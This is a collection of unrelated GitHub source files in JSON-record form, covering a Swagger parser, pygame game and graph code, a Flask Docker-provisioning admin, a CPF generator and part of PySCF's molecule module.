:rtype: list\n \"\"\"\n result = self.parameters\n if locations:\n result = filter(lambda x: x.location_in in locations, result)\n if excludes:\n result = filter(lambda x: x.location_in not in excludes, result)\n return list(result)\n\n @cached_property\n def body(self):\n \"\"\" Return body request parameter\n\n :return: Body parameter\n :rtype: Parameter or None\n \"\"\"\n body = self.get_parameters_by_location(['body'])\n return self.root.schemas.get(body[0].type) if body else None\n\n\nclass AbstractTypeObject(object):\n\n _type = None\n type_format = None\n properties = None\n item = None #: set if type is array\n\n def __init__(self, obj, name, root, **kwargs):\n self.raw = obj\n self.name = name\n self.root = root\n\n def get_type_properties(self, property_obj, name):\n \"\"\" Get internal properties of property\n\n :param dict property_obj: raw property object\n :param str name: name of property\n :return: Type, format and internal properties of property\n :rtype: tuple(str, str, dict)\n \"\"\"\n property_type = property_obj.get('type', 'object')\n property_format = property_obj.get('format')\n property_dict = dict()\n\n if property_type in ['object', 'array']:\n schema_id = self._get_object_schema_id(property_obj, SchemaTypes.INLINE)\n if not ('$ref' in property_obj or SchemaObjects.get(schema_id)):\n _schema = SchemaObjects.create_schema(\n property_obj, name, SchemaTypes.INLINE, root=self.root)\n self._after_create_schema(_schema)\n property_type = schema_id\n\n if 'default' in property_obj:\n property_dict['default'] = property_obj['default']\n\n if 'maximum' in property_obj:\n property_dict['maximum'] = property_obj['maximum']\n property_dict['exclusive_maximum'] = property_obj.get('exclusiveMaximum', False)\n\n if 'minimum' in property_obj:\n property_dict['minimum'] = property_obj['minimum']\n property_dict['exclusive_minimum'] = property_obj.get('exclusiveMinimum', False)\n\n if 'maxLength' in property_obj:\n property_dict['max_length'] = property_obj['maxLength']\n\n if 'minLength' in property_obj:\n property_dict['min_length'] = property_obj['minLength']\n\n if 'enum' in property_obj:\n property_dict['enum'] = property_obj['enum']\n\n return property_type, property_format, property_dict\n\n @staticmethod\n def _get_id(base):\n m = md5()\n m.update(base.encode('utf-8'))\n return m.hexdigest()\n\n def _get_object_schema_id(self, obj, schema_type):\n if '$ref' in obj:\n base = obj['$ref']\n prefix = SchemaTypes.prefixes[SchemaTypes.DEFINITION]\n else:\n base = json.dumps(obj)\n prefix = SchemaTypes.prefixes[schema_type]\n return '{}_{}'.format(prefix, self._get_id(base))\n\n def set_type_by_schema(self, schema_obj):\n \"\"\"\n Set property type by schema object\n Schema will create, if it doesn't exists in collection\n\n :param dict schema_obj: raw schema object\n \"\"\"\n schema_id = self._get_object_schema_id(schema_obj, SchemaTypes.INLINE)\n\n # TODO:\n if schema_obj.get('additionalProperties'):\n self._type = 'object'\n return\n if not SchemaObjects.contains(schema_id):\n schema = SchemaObjects.create_schema(\n schema_obj, self.name, SchemaTypes.INLINE, root=self.root)\n assert schema.schema_id == schema_id\n self._type = schema_id\n\n def _after_create_schema(self, schema):\n pass\n\n @property\n def type(self):\n return self._type\n\n @property\n def is_array(self):\n return self._type == 'array'\n\n\nclass Parameter(AbstractTypeObject):\n \"\"\" Represents Swagger Parameter Object\n \"\"\"\n def __init__(self, obj, **kwargs):\n super(Parameter, self).__init__(obj, **kwargs)\n self.location_in = obj['in']\n self.required = obj.get('required', False)\n self.description = obj.get('description', '')\n self.default = obj.get('default')\n self.collection_format = obj.get('collectionFormat')\n\n self._set_type()\n\n def _set_type(self):\n if 'type' in self.raw:\n self._type = self.raw['type']\n self.type_format = self.raw.get('format')\n if self.is_array:\n self.item = dict(zip(\n ('type', 'type_format', 'type_properties'),\n self.get_type_properties(self.raw['items'], self.name)))\n else:\n _, _, self.properties = self.get_type_properties(self.raw, self.name)\n elif 'schema' in self.raw:\n self.set_type_by_schema(self.raw['schema'])\n else:\n raise ConverterError('Invalid structure')\n\n @property\n def type(self):\n if self.is_array:\n return 'array of {}'.format(self.item['type'])\n else:\n return self._type\n\n def __repr__(self):\n return '{}_{}'.format(self.location_in, self.name)\n\n\nclass Response(AbstractTypeObject):\n \"\"\" Represents Swagger Response Object\n \"\"\"\n headers = None\n examples = None\n\n def __init__(self, obj, **kwargs):\n super(Response, self).__init__(obj, **kwargs)\n self.description = obj['description']\n self.examples = obj.get('examples')\n\n if 'schema' in obj:\n self._set_type()\n\n if 'headers' in obj:\n self.headers = {name: Header(header, name=name, root=self.root)\n for name, header in obj['headers'].items()}\n\n def _set_type(self):\n if 'type' in self.raw['schema'] and self.raw['schema']['type'] in PRIMITIVE_TYPES:\n self._type = self.raw['schema']['type']\n self.type_format = self.raw['schema'].get('format')\n _, _, self.properties = self.get_type_properties(self.raw, self.name)\n else:\n self.set_type_by_schema(self.raw['schema'])\n\n\nclass Header(AbstractTypeObject):\n \"\"\" Represents Swagger Header Object\n \"\"\"\n\n def __init__(self, obj, **kwargs):\n super(Header, self).__init__(obj, **kwargs)\n self.description = obj.get('description')\n self._set_type()\n\n def _set_type(self):\n self._type = self.raw['type']\n if self._type not in PRIMITIVE_TYPES and self._type != 'array':\n raise ConverterError(\n 'Invalid type of response header {}'.format(self.name))\n\n self.type_format = self.raw.get('format')\n if self.is_array:\n self.item = dict(zip(\n ('type', 'type_format', 'type_properties'),\n self.get_type_properties(self.raw['items'], self.name)))\n else:\n _, _, self.properties = self.get_type_properties(self.raw, self.name)\n\n\nclass Schema(AbstractTypeObject):\n \"\"\" Represents Swagger Schema Object\n \"\"\"\n schema_id = None\n schema_type = None #: definition or inline\n ref_path = None #: path for definition schemas\n nested_schemas = None\n all_of = None\n\n def __init__(self, obj, schema_type, **kwargs):\n\n assert schema_type in SchemaTypes.prefixes\n super(Schema, self).__init__(obj, **kwargs)\n self.nested_schemas = set()\n self.schema_type = schema_type\n self._type = obj.get('type', 'object')\n # assert self._type in ('array', 'object')\n\n self.type_format = obj.get('format')\n self.schema_example = obj.get('example')\n self.read_only = obj.get('readOnly', False)\n self.external_docs = obj.get('externalDocs')\n\n if self._type in PRIMITIVE_TYPES:\n self.properties = [{\n 'name': kwargs.get('name', ''),\n 'description': '',\n 'required': obj.get('required', False),\n 'type': self.type,\n 'type_format': self.type_format,\n 'type_properties': self.get_type_properties(obj, '')[2],\n }]\n\n if schema_type != SchemaTypes.INLINE:\n self.ref_path = '#/definitions/{}'.format(self.name)\n\n if self.is_array:\n self.item = dict(zip(\n ('type', 'type_format', 'type_properties'),\n self.get_type_properties(obj['items'], self.name)\n ))\n self.name += '_array'\n if self.item['type'] not in PRIMITIVE_TYPES:\n self.nested_schemas.add(self.item['type'])\n\n if 'properties' in obj:\n # self.example = dict()\n self._set_properties()\n\n if 'allOf' in obj:\n self.all_of = []\n for _obj in obj['allOf']:\n _id = self._get_object_schema_id(_obj, SchemaTypes.INLINE)\n if not SchemaObjects.contains(_id):\n schema = SchemaObjects.create_schema(\n _obj, 'inline', SchemaTypes.INLINE, self.root)\n assert schema.schema_id == _id\n self.all_of.append(_id)\n self.nested_schemas.add(_id)\n\n self._set_schema_id()\n\n def _set_schema_id(self):\n _id = self._get_id(self.ref_path or json.dumps(self.raw))\n self.schema_id = '{}_{}'.format(\n SchemaTypes.prefixes[self.schema_type], _id)\n\n def _set_properties(self):\n self.properties = []\n required_fields = self.raw.get('required', [])\n\n for name, property_obj in self.raw['properties'].items():\n\n property_type, property_format, prop = self.get_type_properties(property_obj, name)\n if property_type not in PRIMITIVE_TYPES:\n self.nested_schemas.add(property_type)\n\n _obj = {\n 'name': name,\n 'description': '',\n 'required': name in required_fields,\n 'type': property_type,\n 'type_format': property_format,\n 'type_properties': prop,\n\n }\n if 'description' in property_obj:\n _obj['description'] = property_obj['description'].replace('\"', '\\'')\n\n self.properties.append(_obj)\n\n def _after_create_schema(self, schema):\n if not self.is_array:\n self.nested_schemas |= schema.nested_schemas\n\n @property\n def is_inline(self):\n return self.schema_type == SchemaTypes.INLINE\n\n @property\n def is_inline_array(self):\n return self.is_inline and self.is_array\n\n def __repr__(self):\n return self.name\n\n\nclass SecurityDefinition(object):\n \"\"\" Represents Swagger Security Scheme Object\n \"\"\"\n scopes = None\n location_in = None\n param_name = None\n flow = None\n auth_url = None\n token_url = None\n\n def __init__(self, name, obj):\n\n self.name = name\n self.type = obj['type']\n assert self.type in SecurityTypes.names\n\n self.description = obj.get('description', '')\n self.raw = obj\n\n if self.type == SecurityTypes.API_KEY:\n self.location_in = obj['in']\n self.param_name = obj['name']\n elif self.type == SecurityTypes.OAUTH2:\n self.flow = obj['flow']\n assert self.flow in ('implicit', 'password', 'application', 'accessCode')\n\n if self.flow in ('implicit', 'accessCode'):\n self.auth_url = obj['authorizationUrl']\n if self.flow in ('password', 'accessCode', 'application'):\n self.token_url = obj['tokenUrl']\n\n self.scopes = obj['scopes']\n\n @property\n def type_name(self):\n return SecurityTypes.names[self.type]\n","repo_name":"IIKovalenko/swagger2rst","sub_path":"swg2rst/swagger.py","file_name":"swagger.py","file_ext":"py","file_size_in_byte":35142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"36525159338","text":"import pygame\nfrom pygame import Rect, key, mouse, transform\n\nfrom characters.character import Character\n\n\nclass Knight(Character):\n GRAVITY_VELOCITY = 1\n MOVEMENT_VELOCITY = 4\n\n def __init__(self, x, y, idle, walk, attack, hurt, death, jump, clouds: list, screen_height):\n super().__init__(x, y, idle, walk, attack, death)\n self.rect: Rect = self.image.get_rect(midbottom=(x, y)).inflate(0, -4)\n self.jump_image = jump\n self.hurt_images = hurt\n self.clouds = clouds\n self.gravity = 0\n self.attack_timer = 0\n self.health = 3\n self.colliding = False\n self.going_right = True\n self.moved = False\n self.attacking = False\n self.damaged = False\n self.screen_height = screen_height\n\n @classmethod\n def create_knight(cls, cloud_coordinates: Rect, idle, walk, attack, hurt, death, jump: pygame.image, clouds: list,\n screen_height):\n x, y = cloud_coordinates.x + cloud_coordinates.width // 2, cloud_coordinates.top\n return cls(x, y, idle, walk, attack, hurt, death, jump, clouds, screen_height)\n\n @property\n def coordinates(self):\n return self.rect.x, self.rect.y\n\n @property\n def health(self):\n return self.__health\n\n @health.setter\n def health(self, value):\n if 0 <= value <= 3:\n self.__health = value\n else:\n self.__health = 3\n\n def movement(self):\n keys = key.get_pressed()\n if any((keys[pygame.K_a], keys[pygame.K_d], keys[pygame.K_SPACE] and self.colliding)):\n if keys[pygame.K_a]:\n self.rect.x -= self.MOVEMENT_VELOCITY\n self.going_right = False\n if self.colliding:\n self.image, self.walk_index = self.animation(self.going_right, self.walk_images, self.walk_index)\n else:\n self.image, self.walk_index = transform.flip(self.jump_image, True, False), self.walk_index\n if keys[pygame.K_d]:\n self.rect.x += self.MOVEMENT_VELOCITY\n self.going_right = True\n if self.colliding:\n self.image, self.walk_index = self.animation(self.going_right, self.walk_images, self.walk_index)\n else:\n self.image, self.walk_index = self.jump_image, self.walk_index\n if keys[pygame.K_SPACE] and self.colliding:\n self.gravity = -17\n self.image = self.jump_image if self.going_right else transform.flip(self.jump_image, True, False)\n self.moved = True\n\n def attack(self):\n keys = key.get_pressed()\n\n if (keys[pygame.K_f] or mouse.get_pressed()[0]) and self.attack_timer == 0:\n self.attack_timer = 60\n self.attacking = True\n\n if self.attacking:\n self.image, self.attack_index = self.animation(self.going_right, self.attack_images, self.attack_index,\n 0.15)\n if self.attack_index + 0.15 >= len(self.attack_images):\n self.attacking = False\n\n if self.attack_timer > 0:\n self.attack_timer -= 1\n\n def apply_gravity(self):\n self.gravity += self.GRAVITY_VELOCITY\n self.rect.y += self.gravity\n self.collision()\n\n def collision(self):\n for cloud in self.clouds:\n if self.rect.colliderect(cloud) and self.rect.bottomright[0] - self.rect.width // 2 > cloud.topleft[0]:\n self.rect.midbottom = (self.rect.midbottom[0], cloud.midtop[1])\n self.gravity = 0\n self.colliding = True\n break\n else:\n self.colliding = False\n\n def hurt(self):\n self.image, self.hurt_index = self.animation(self.going_right, self.hurt_images, self.hurt_index)\n self.damaged = True\n\n def check_for_player_out_of_game_range(self):\n if self.rect.y - 1000 >= self.screen_height:\n self.health = 0\n\n def update(self):\n self.apply_gravity()\n if self.damaged:\n if self.hurt_index + 0.1 < len(self.hurt_images):\n self.hurt()\n return\n self.damaged = False\n self.health -= 1\n self.movement()\n self.check_for_player_out_of_game_range()\n self.attack()\n if not self.moved and not self.attacking and self.colliding:\n self.image, self.idle_index = self.animation(self.going_right, self.idle_images, self.idle_index, 0.03)\n self.moved = False if self.colliding else True\n","repo_name":"DanieII/SkyKnight","sub_path":"characters/knight.py","file_name":"knight.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20963568432","text":"#!/usr/bin/env python3\n\nimport argparse\nimport subprocess\nimport glob\nimport os\nimport threading\nimport time\nimport signal\n\nfrom ExprParser import ExprParser\nfrom AppRunner import AppRunner\nfrom LogUtil import clear_log_files\nimport shlex\ndef run_apps(app_schedules,cpu_check,debug):\n now = time.time()\n for app_schedule in app_schedules:\n print('app_schedule: ',end='')\n print(app_schedule)\n app_runners = []\n for app_schedule in app_schedules:\n # init cmd doesn't require schedule\n schedule = app_schedule\n app_runners.append(AppRunner(schedule,\n now,\n debug=debug))\n if(cpu_check):\n #Execute CpuUtilizaiotn\n cpu_cmd=shlex.split(os.getcwd()+'/tools/getCpuUtil.py')\n cpu_thread = subprocess.Popen(cpu_cmd,stdout=subprocess.PIPE,universal_newlines=True)\n\n #Run Scheduled Experiment\n for i,app_runner in enumerate(app_runners):\n app_runner.start()\n\n for i,app_runner in enumerate(app_runners):\n return_app=app_runner.join()\n\n\n\n if(cpu_check):\n #Kill CpuUtilization\n if(cpu_thread.poll()==None):\n cpu_thread.send_signal(signal.SIGINT)\n try:\n out, err=cpu_thread.communicate()\n except(subprocess.SubprocessError):\n print('[INFO] CPU Check Error! '+err)\n if(debug):\n print('[INFO] Cpu Utilization Check End!')\n\n \n if(debug):\n print('[INFO] Execute End')\n\n return app_runners\n\ndef run_expr(expr_schedule,scenario,cpu_check,debug=False):\n\n # run experiment apps\n run_apps(expr_schedule,cpu_check,debug)\n\n\nif __name__ == \"__main__\":\n scenario= ExprParser()\n \n expr_schedule = scenario.expr_schedule\n debug=scenario.debug\n cpu_check=scenario.cpu_check\n\n run_expr(expr_schedule,scenario,cpu_check,debug)","repo_name":"markyang92/experiment_tool","sub_path":"script/exp_script/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10348578256","text":"from funcoes_e_variaveis import texto, titulo, mostra_todos_servicos, mostra_profissionais, conectar, encerrar_conexao, \\\n agendamento_cadastro_cliente, agendamento_escolha_servico_e_profissional, funcao_marcacao_data_e_horario, \\\n funcao_confirmacao_do_pedido_feito, adicao_de_servico, insere_clientes, insere_agendamentos, apresentacao_pedido, \\\n consulta_clientes_bd, add_cliente, edita_cliente, exclui_clientes, procura_cliente_especifico, edita_agendamento, \\\n exclui_agendamentos, funcao_menu_edicao_dos_clientes\n\nglobal con\n########################################################################################################\n #PARTE 1 de 2\n########################################################################################################\n\nwhile True:\n\n confirmacao_pedido = funcao_confirmacao_do_pedido_feito()\n\n add_servico = adicao_de_servico()\n if add_servico == 'N':\n break\n\ntitulo('TUDO CERTO. ATÉ LOGO.')\n\nif confirmacao_pedido == 'S' and add_servico == 'N': # INSERE DADOS NO BD:\n\n insere_clientes() # INSERE DADOS NA TABELA CLIENTES:\n insere_agendamentos() # INSERE DADOS NA TABELA AGENDAMENTOS:\n\n########################################################################################################\n #PARTE 2 de 2\n#########################################################################################################\n# EDIÇÃO DE CLIENTES E AGENDAMENTOS: # apenas banco de dados\n\n# MENU DE EDIÇÃO\nfuncao_menu_edicao_dos_clientes()\n","repo_name":"renan-israel/PROJETO-AGENDA","sub_path":"arquivos Python/sistema.py","file_name":"sistema.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30992386166","text":"from bci.database.mongo.mongodb import MongoDB\n\n\nclass CustomMongoDB(MongoDB):\n\n def __init__(self):\n super().__init__()\n self.data_collection_names = {\n \"chromium\": \"custom_chromium_data_test\",\n \"firefox\": \"custom_firefox_release_data_test\"\n }\n\n def __get_data_collection(self, browser_name: str):\n collection_name = self.data_collection_names[browser_name]\n if collection_name not in self.db.collection_names():\n raise AttributeError(\"Collection '%s' not found in database\" % collection_name)\n return self.db[collection_name]\n","repo_name":"DistriNet/BugHog","sub_path":"bci/evaluations/custom/custom_mongodb.py","file_name":"custom_mongodb.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"14637035614","text":"from flask import Flask, request\nfrom flask import jsonify\nfrom clients import ClientDocker\nfrom config import admin_config\n\nENV = 'development'\nadmin = Flask(__name__)\nconfig = admin_config[ENV]()\nimage_map = config.image_map\ncld = ClientDocker(config.docker_url)\n\n# helper functions\ndef request_image_mapper(request):\n image = image_map[request['type']][request['distribution']]['image']\n port = image_map[request['type']][request['distribution']]['default_port']\n volume = image_map[request['type']][request['distribution']]['data_location']\n env_vars = image_map[request['type']][request['distribution']]['env_vars']\n\n return image, port, volume, env_vars\n\ndef handle_port_response(port_dict, default_port, found):\n default_port = default_port[0] + '/tcp'\n if found:\n port = port_dict[default_port][0]['HostPort']\n else:\n port = port_dict[default_port]\n \n return port\n\n# Routes\n@admin.route('/')\ndef index():\n return 'Hello World!'\n\n@admin.route('/get_all_containers')\ndef get_all_containers():\n return jsonify(cld.get_all_containers())\n\n@admin.route('/get_active_containers')\ndef get_active_containers():\n return jsonify(cld.get_active_containers())\n\n@admin.route('/get_active_container_ports')\ndef get_active_container_ports():\n return jsonify(cld.get_active_container_ports())\n\n@admin.route('/get_all_container_ports')\ndef get_all_container_ports():\n return jsonify(cld.get_all_container_ports())\n\n@admin.route('/provision_container', methods=['POST'])\ndef provision_container():\n req_json = request.get_json()\n image, port, volume, env_vars = request_image_mapper(req_json)\n cntr_id = cld.provision_container(image, port, volume, env_vars)\n\n return f'{cntr_id}'\n\n@admin.route('/provide_db', methods=['POST'])\ndef provide_db():\n req_json = request.get_json()\n image, port, volume, env_vars = request_image_mapper(req_json)\n # check whether a new instance is required\n new = True if req_json['new'] == 'yes' else False\n if new:\n # provision container and return name, container, ports\n cntr_resp = cld.provision_container(image, port, volume, env_vars)\n resp_obj = cntr_resp\n resp_obj['port'] = handle_port_response(resp_obj['port'], port, False)\n else:\n query_name = req_json['distribution'] + '-' + req_json['instance'].zfill(2)\n container_query_result = cld.get_container(query_name)\n\n if bool(container_query_result['exists']):\n # check status\n if container_query_result['status'] == 'running':\n resp_obj = {\n 'name': container_query_result['name'],\n 'id': container_query_result['id'],\n 'port': handle_port_response(container_query_result['ports'], port, True)\n }\n elif container_query_result['status'] == 'exited':\n # pass the container id\n container_resp = cld.start_container(container_query_result['id'])\n # return the response object\n resp_obj = container_resp\n resp_obj['port'] = handle_port_response(resp_obj['port'], port, True)\n else:\n raise ValueError('Unknow container status')\n else:\n # provision newl container and return name, container, ports\n cntr_resp = cld.provision_container(image, port, volume, env_vars)\n resp_obj = cntr_resp\n resp_obj['port'] = handle_port_response(resp_obj['port'], port, False)\n\n return jsonify(resp_obj)\n\nif __name__ == '__main__':\n admin.run(debug=True)","repo_name":"gsam1/scraper-hub","sub_path":"admin/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42914821161","text":"import re\r\nimport pygame\r\n\r\nimport config\r\nfrom data import Graph\r\nfrom geometric import Point, Line\r\n\r\n# чтение фигур и точек из файла\r\ndiagonals = list()\r\nlines = list()\r\n\r\ngraph = Graph()\r\nwith open(config.cache_line, 'r') as file:\r\n x_s, y_s, x_e, y_e = map(float, re.findall(r\"\\d+.\\d+\", file.readline()))\r\n point_start = Point(x_s, y_s)\r\n point_end = Point(x_e, y_e)\r\n\r\n graph.addTop(point_start)\r\n graph.addTop(point_end)\r\n new_line = file.readline()\r\n for point_str in new_line.split(\";\"):\r\n x, y = map(float, re.findall(r\"\\d+.\\d+\", point_str))\r\n point = Point(x, y)\r\n graph.addTop(point)\r\n\r\n new_line = file.readline()\r\n for line_str in new_line.split(\";\"):\r\n x1, y1, x2, y2 = map(float, re.findall(r\"\\d+.\\d+\", line_str))\r\n p1 = Point(x1, y1)\r\n p2 = Point(x2, y2)\r\n\r\n line = Line(p1, p2)\r\n\r\n lines.append(line)\r\n\r\n new_line = file.readline()\r\n for diagonal_str in new_line.split(\";\"):\r\n x1, y1, x2, y2 = map(float, re.findall(r\"\\d+.\\d+\", diagonal_str))\r\n diagonals.append(Line(Point(x1, y1), Point(x2, y2)))\r\n continue\r\n\r\n# полное построение графа\r\nwith open(config.cache_graph, 'r') as file:\r\n n = int(file.readline())\r\n\r\n for i in range(n):\r\n arcs = file.readline()\r\n for arc in arcs.split(\";\"):\r\n num1, num2 = arc.split(\",\")\r\n num1 = int(num1)\r\n num2 = float(num2)\r\n\r\n graph.connect(i, num1, num2)\r\n\r\n# считывание пути\r\nwith open(config.cache_way, 'r') as file:\r\n weight = file.readline()\r\n\r\n new_line = file.readline()\r\n way = list(map(int, new_line.split(',')))\r\n\r\npygame.init()\r\ndisplay = pygame.display.set_mode((1080, 600))\r\npygame.display.update()\r\n\r\nscale = config.scale\r\n\r\ngame_run = True\r\nwhile game_run:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n game_run = False\r\n\r\n for d in diagonals:\r\n pygame.draw.line(display, (125, 125, 125), d.point1.getXY(scale), d.point2.getXY(scale), 6)\r\n\r\n for l in lines:\r\n pygame.draw.line(display, (125, 125, 125), l.point1.getXY(scale), l.point2.getXY(scale), 5)\r\n\r\n for p in graph.tops:\r\n pygame.draw.circle(display, (255, 255, 0), p.getXY(scale), 3)\r\n\r\n for num, indexes in enumerate(graph.connections):\r\n for index in indexes:\r\n pygame.draw.line(display, (0, 255, 0), graph.tops[num].getXY(scale), graph.tops[index.key].getXY(scale), 2)\r\n\r\n num = 1\r\n while num < len(way):\r\n pygame.draw.line(display, (255, 0, 0), graph.tops[way[num - 1]].getXY(scale),\r\n graph.tops[way[num]].getXY(scale), 6)\r\n num += 1\r\n\r\n pygame.draw.circle(display, (0, 0, 255), point_start.getXY(scale), 5)\r\n pygame.draw.circle(display, (255, 255, 255), point_end.getXY(scale), 5)\r\n\r\n pygame.time.wait(1)\r\n pygame.display.update()\r\n\r\npygame.quit()\r\nquit()","repo_name":"RomanGhost/GraphVisible","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15174188261","text":"from random import randint\n\nnove_digitos = ''\n\nfor i in range(9):\n nove_digitos += str(randint(0, 9))\n\nmult_1 = 10\nresultado_1 = 0\n\nfor digito in nove_digitos:\n resultado_1 += int(digito) * mult_1\n mult_1 -= 1\n\ndigito_1 = resultado_1 * 10 % 11\ndigito_1 = digito_1 if digito_1 <= 9 else 0\n\ndez_digitos = nove_digitos + str(digito_1)\n\nmult_2 = 11\nresultado_2 = 0\n\nfor digito in dez_digitos:\n resultado_2 += int(digito) * mult_2\n mult_2 -= 1\n\ndigito_2 = resultado_2 * 10 % 11\ndigito_2 = digito_2 if digito_2 <= 9 else 0\n\ncpf = f'{nove_digitos}{digito_1}{digito_2}'\n\nprint(cpf)","repo_name":"Igor-Nunes-Fontoura/Python","sub_path":"Exercicios_Python/aula067.py","file_name":"aula067.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2702016717","text":"#!/usr/bin/env python\n# -*- coding: utf-8\n#\n# Author: Qiming Sun \n#\n\nimport os, sys\nimport platform\nimport gc\nimport time\nimport math\nimport json\nimport numpy\nimport scipy.special\nimport ctypes\nimport pyscf.lib\nimport pyscf.lib.parameters as param\nfrom pyscf.lib import logger\nfrom pyscf.gto import cmd_args\nfrom pyscf.gto import basis\nfrom pyscf.gto import moleintor\nfrom pyscf.gto.eval_gto import eval_gto\nimport pyscf.gto.ecp\n\n\ndef M(**kwargs):\n r'''This is a shortcut to build up Mole object.\n\n Args: Same to :func:`Mole.build`\n\n Examples:\n\n >>> from pyscf import gto\n >>> mol = gto.M(atom='H 0 0 0; F 0 0 1', basis='6-31g')\n '''\n mol = Mole()\n mol.build(**kwargs)\n return mol\n\ndef _gaussian_int(n, alpha):\n r'''int_0^inf x^n exp(-alpha x^2) dx'''\n n1 = (n + 1) * .5\n return scipy.special.gamma(n1) / (2. * alpha**n1)\n\ndef gto_norm(l, expnt):\n r'''Normalized factor for GTO radial part :math:`g=r^l e^{-\\alpha r^2}`\n\n .. math::\n\n \\frac{1}{\\sqrt{\\int g^2 r^2 dr}}\n = \\sqrt{\\frac{2^{2l+3} (l+1)! (2a)^{l+1.5}}{(2l+2)!\\sqrt{\\pi}}}\n\n Ref: H. B. Schlegel and M. J. Frisch, Int. J. Quant. Chem., 54(1995), 83-87.\n\n Args:\n l (int):\n angular momentum\n expnt :\n exponent :math:`\\alpha`\n\n Returns:\n normalization factor\n\n Examples:\n\n >>> print gto_norm(0, 1)\n 2.5264751109842591\n '''\n if l >= 0:\n #f = 2**(2*l+3) * math.factorial(l+1) * (2*expnt)**(l+1.5) \\\n # / (math.factorial(2*l+2) * math.sqrt(math.pi))\n #return math.sqrt(f)\n return 1/numpy.sqrt(_gaussian_int(l*2+2, 2*expnt))\n else:\n raise ValueError('l should be > 0')\n\ndef cart2sph(l):\n '''Cartesian to real spheric transformation matrix'''\n nf = (l+1)*(l+2)//2\n cmat = numpy.eye(nf)\n if l in (0, 1):\n return cmat\n else:\n nd = l * 2 + 1\n c2sph = numpy.zeros((nf,nd), order='F')\n fn = moleintor.libcgto.CINTc2s_ket_sph\n fn(c2sph.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(nf),\n cmat.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(l))\n return c2sph\n\ndef cart2j_kappa(kappa):\n '''Cartesian to spinor, indexed by kappa'''\n assert(kappa != 0)\n if kappa < 0:\n l = -kappa - 1\n nd = l * 2 + 2\n else:\n l = kappa\n nd = l * 2\n nf = (l+1)*(l+2)//2\n c2sph = numpy.zeros((nf,nd), order='F', dtype=numpy.complex)\n cmat = numpy.eye(nf)\n fn(c2sph.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(nf),\n cmat.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(l),\n ctypes.c_int(kappa))\n return c2spinor\n\ndef cart2j_l(l):\n '''Cartesian to spinor, indexed by l'''\n nf = (l+1)*(l+2)//2\n nd = l * 4 + 2\n c2sph = numpy.zeros((nf,nd), order='F', dtype=numpy.complex)\n cmat = numpy.eye(nf)\n fn(c2sph.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(nf),\n cmat.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(l), ctypes.c_int(0))\n return c2spinor\n\ndef atom_types(atoms, basis=None):\n '''symmetry inequivalent atoms'''\n atmgroup = {}\n for ia, a in enumerate(atoms):\n if a[0] in atmgroup:\n atmgroup[a[0]].append(ia)\n elif basis is None:\n atmgroup[a[0]] = [ia]\n else:\n stdsymb = _std_symbol(a[0])\n if a[0] in basis:\n if stdsymb in basis and basis[a[0]] == basis[stdsymb]:\n if stdsymb in atmgroup:\n atmgroup[stdsymb].append(ia)\n else:\n atmgroup[stdsymb] = [ia]\n else:\n atmgroup[a[0]] = [ia]\n elif stdsymb in atmgroup:\n atmgroup[stdsymb].append(ia)\n else:\n atmgroup[stdsymb] = [ia]\n return atmgroup\n\n\ndef format_atom(atoms, origin=0, axes=1, unit='Ang'):\n '''Convert the input :attr:`Mole.atom` to the internal data format.\n Including, changing the nuclear charge to atom symbol, converting the\n coordinates to AU, rotate and shift the molecule.\n If the :attr:`~Mole.atom` is a string, it takes \";\" and \"\\\\n\"\n for the mark to separate atoms; \",\" and arbitrary length of blank space\n to spearate the individual terms for an atom. Blank line will be ignored.\n\n Args:\n atoms : list or str\n the same to :attr:`Mole.atom`\n\n Kwargs:\n origin : ndarray\n new axis origin.\n axes : ndarray\n (new_x, new_y, new_z), each entry is a length-3 array\n unit : str or number\n If unit is one of strings (B, b, Bohr, bohr, AU, au), the coordinates\n of the input atoms are the atomic unit; If unit is one of strings\n (A, a, Angstrom, angstrom, Ang, ang), the coordinates are in the\n unit of angstrom; If a number is given, the number are considered\n as the Bohr value (in angstrom), which should be around 0.53\n\n Returns:\n \"atoms\" in the internal format as :attr:`~Mole._atom`\n\n Examples:\n\n >>> gto.format_atom('9,0,0,0; h@1 0 0 1', origin=(1,1,1))\n [['F', [-1.0, -1.0, -1.0]], ['H@1', [-1.0, -1.0, 0.0]]]\n >>> gto.format_atom(['9,0,0,0', (1, (0, 0, 1))], origin=(1,1,1))\n [['F', [-1.0, -1.0, -1.0]], ['H', [-1, -1, 0]]]\n '''\n if isinstance(unit, str):\n if unit.startswith(('B','b','au','AU')):\n convert = 1\n else: #if unit.startswith(('A','a')):\n convert = 1./param.BOHR\n else:\n convert = 1./unit\n fmt_atoms = []\n def str2atm(line):\n dat = line.split()\n if dat[0].isdigit():\n symb = param.ELEMENTS[int(dat[0])][0]\n else:\n rawsymb = _rm_digit(dat[0])\n symb = dat[0].replace(rawsymb, _std_symbol(rawsymb))\n c = numpy.asarray([float(x) for x in dat[1:4]]) - origin\n return [symb, numpy.dot(axes, c*convert).tolist()]\n\n if isinstance(atoms, str):\n atoms = atoms.replace(';','\\n').replace(',',' ').replace('\\t',' ')\n for line in 